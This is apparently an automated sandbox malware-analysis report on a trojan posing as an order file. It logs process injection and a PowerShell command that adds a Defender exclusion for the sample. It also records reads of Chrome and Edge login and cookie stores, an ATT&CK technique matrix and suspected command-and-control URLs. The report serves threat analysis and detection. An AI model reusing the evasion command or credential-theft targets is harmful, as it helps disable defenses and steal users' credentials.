            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01436420 mov eax, dword ptr fs:[00000030h]5_2_01436420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01436420 mov eax, dword ptr fs:[00000030h]5_2_01436420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01436420 mov eax, dword ptr fs:[00000030h]5_2_01436420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01436420 mov eax, dword ptr fs:[00000030h]5_2_01436420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01436420 mov eax, dword ptr fs:[00000030h]5_2_01436420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01436420 mov eax, dword ptr fs:[00000030h]5_2_01436420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013A645D mov eax, dword ptr fs:[00000030h]5_2_013A645D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D245A mov eax, dword ptr fs:[00000030h]5_2_013D245A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE443 mov eax, dword ptr fs:[00000030h]5_2_013EE443
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE443 mov eax, dword ptr fs:[00000030h]5_2_013EE443
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE443 mov eax, dword ptr fs:[00000030h]5_2_013EE443
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE443 mov eax, dword ptr fs:[00000030h]5_2_013EE443
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE443 mov eax, dword ptr fs:[00000030h]5_2_013EE443
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE443 mov eax, dword ptr fs:[00000030h]5_2_013EE443
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE443 mov eax, dword ptr fs:[00000030h]5_2_013EE443
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE443 mov eax, dword ptr fs:[00000030h]5_2_013EE443
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E44B0 mov ecx, dword ptr fs:[00000030h]5_2_013E44B0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B64AB mov eax, dword ptr fs:[00000030h]5_2_013B64AB
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0146A49A mov eax, dword ptr fs:[00000030h]5_2_0146A49A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B04E5 mov ecx, dword ptr fs:[00000030h]5_2_013B04E5
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143A4B0 mov eax, dword ptr fs:[00000030h]5_2_0143A4B0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E273C mov eax, dword ptr fs:[00000030h]5_2_013E273C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E273C mov ecx, dword ptr fs:[00000030h]5_2_013E273C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E273C mov eax, dword ptr fs:[00000030h]5_2_013E273C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01434755 mov eax, dword ptr fs:[00000030h]5_2_01434755
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EC720 mov eax, dword ptr fs:[00000030h]5_2_013EC720
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EC720 mov eax, dword ptr fs:[00000030h]5_2_013EC720
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143E75D mov eax, dword ptr fs:[00000030h]5_2_0143E75D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B0710 mov eax, dword ptr fs:[00000030h]5_2_013B0710
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E0710 mov eax, dword ptr fs:[00000030h]5_2_013E0710
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EC700 mov eax, dword ptr fs:[00000030h]5_2_013EC700
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B8770 mov eax, dword ptr fs:[00000030h]5_2_013B8770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0770 mov eax, dword ptr fs:[00000030h]5_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B0750 mov eax, dword ptr fs:[00000030h]5_2_013B0750
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2750 mov eax, dword ptr fs:[00000030h]5_2_013F2750
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2750 mov eax, dword ptr fs:[00000030h]5_2_013F2750
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142C730 mov eax, dword ptr fs:[00000030h]5_2_0142C730
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E674D mov esi, dword ptr fs:[00000030h]5_2_013E674D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E674D mov eax, dword ptr fs:[00000030h]5_2_013E674D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E674D mov eax, dword ptr fs:[00000030h]5_2_013E674D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014307C3 mov eax, dword ptr fs:[00000030h]5_2_014307C3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process token adjusted: Debug
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                NtResumeThread: Direct from: 0x773836AC
                NtMapViewOfSection: Direct from: 0x77382D1C
                NtWriteVirtualMemory: Direct from: 0x77382E3C
                NtProtectVirtualMemory: Direct from: 0x77382F9C
                NtSetInformationThread: Direct from: 0x773763F9
                NtCreateMutant: Direct from: 0x773835CC
                NtNotifyChangeKey: Direct from: 0x77383C2C
                NtSetInformationProcess: Direct from: 0x77382C5C
                NtCreateUserProcess: Direct from: 0x7738371C
                NtQueryInformationProcess: Direct from: 0x77382C26
                NtResumeThread: Direct from: 0x77382FBC
                NtWriteVirtualMemory: Direct from: 0x7738490C
                NtAllocateVirtualMemory: Direct from: 0x77383C9C
                NtReadFile: Direct from: 0x77382ADC
                NtAllocateVirtualMemory: Direct from: 0x77382BFC
                NtDelayExecution: Direct from: 0x77382DDC
                NtQuerySystemInformation: Direct from: 0x77382DFC
                NtOpenSection: Direct from: 0x77382E0C
                NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                NtQuerySystemInformation: Direct from: 0x773848CC
                NtReadVirtualMemory: Direct from: 0x77382E8C
                NtCreateKey: Direct from: 0x77382C6C
                NtClose: Direct from: 0x77382B6C
                NtAllocateVirtualMemory: Direct from: 0x773848EC
                NtQueryAttributesFile: Direct from: 0x77382E6C
                NtSetInformationThread: Direct from: 0x77382B4C
                NtTerminateThread: Direct from: 0x77382FCC
                NtQueryInformationToken: Direct from: 0x77382CAC
                NtOpenKeyEx: Direct from: 0x77382B9C
                NtAllocateVirtualMemory: Direct from: 0x77382BEC
                NtDeviceIoControlFile: Direct from: 0x77382AEC
                NtCreateFile: Direct from: 0x77382FEC
                NtOpenFile: Direct from: 0x77382DCC
                NtProtectVirtualMemory: Direct from: 0x77377B2E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
                Memory written: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe base: 400000 value starts with: 4D5A
                Section loaded: NULL target: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe protection: execute and read and write
                Section loaded: NULL target: C:\Windows\SysWOW64\compact.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\compact.exe
                Section loaded: NULL target: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe protection: read write
                Section loaded: NULL target: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe protection: execute and read and write
                Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Thread register set: target process: 404
                Thread APC queued: target process: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
                Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
                Process created: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
            Source: C:\Windows\SysWOW64\compact.exe
                Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: EUSOiCcoIEEJJ.exe, 00000009.00000000.2432222159.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000002.4571003137.00000000011F1000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000000.2574330304.0000000000F31000.00000002.00000001.00040000.00000000.sdmp
                Binary or memory string: IProgram Manager
                Binary or memory string: Shell_TrayWnd
                Binary or memory string: Progman
                Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
                Queries volume information: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Queries volume information: C:\ VolumeInformation
                Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
                Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match
                File source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack, type: UNPACKEDPE
                File source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
                File source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                File source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                File source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                File source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                File source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                File source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                File source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                File source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\compact.exe
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match
                File source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack, type: UNPACKEDPE
                File source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
                File source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                File source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                File source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                File source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                File source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                File source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                File source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                File source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
            [Behavior graph: ID: 1467083, Sample: Art_Spec. 4008670601 AZTEK ..., Startdate: 03/07/2024, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe | 24% | ReversingLabs | Win32.Trojan.Generic |
            Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            http://www.mengistiebethlehem.com/Christmas_City_Studio.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix100%Avira URL Cloudmalware
            https://hao7.vip0%Avira URL Cloudsafe
            http://www.mengistiebethlehem.com/92z0/?OdjTHtuX=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Y6vp=3PLd8j0%Avira URL Cloudsafe
            https://delivery.consentmanager.net0%Avira URL Cloudsafe
            https://support.hostgator.com/0%Avira URL Cloudsafe
            http://www.superunicornpalace.com/mwa4/0%Avira URL Cloudsafe
            http://www.easybackpage.net/3jr0/?OdjTHtuX=C6nbN3Z6SrmD48dKFL5Pdr+cZFmYp1QsQ3e628IyGZcRZCB2vhKb6ox4g6I37OYbmAVSFMbRXnVDWcusSAPk0vfQfIagm0ASlZK02lSA38wn9PDfH1oUKWJrxTMbBcOAU+1qziI=&Y6vp=3PLd8j0%Avira URL Cloudsafe
            http://www.rz6grmvv.shop/wvam/?Y6vp=3PLd8j&OdjTHtuX=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4=0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
            http://www.hellokong.xyz/oui5/?OdjTHtuX=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Y6vp=3PLd8j0%Avira URL Cloudsafe
            https://www.fondazionegtech.org/jmiz/?OdjTHtuX=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWK0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot100%Avira URL Cloudmalware
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
            http://www.3cubesinterior.in/n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw=0%Avira URL Cloudsafe
            http://www.mengistiebethlehem.com/92z0/0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff0%Avira URL Cloudsafe
            http://3cubesinterior.in/n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTX0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
            https://www.sedo.com/services/parking.php30%Avira URL Cloudsafe
            http://www.mengistiebethlehem.com/Lehigh_Valley.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2F0%Avira URL Cloudsafe
            http://www.hondamechanic.today0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf0%Avira URL Cloudsafe
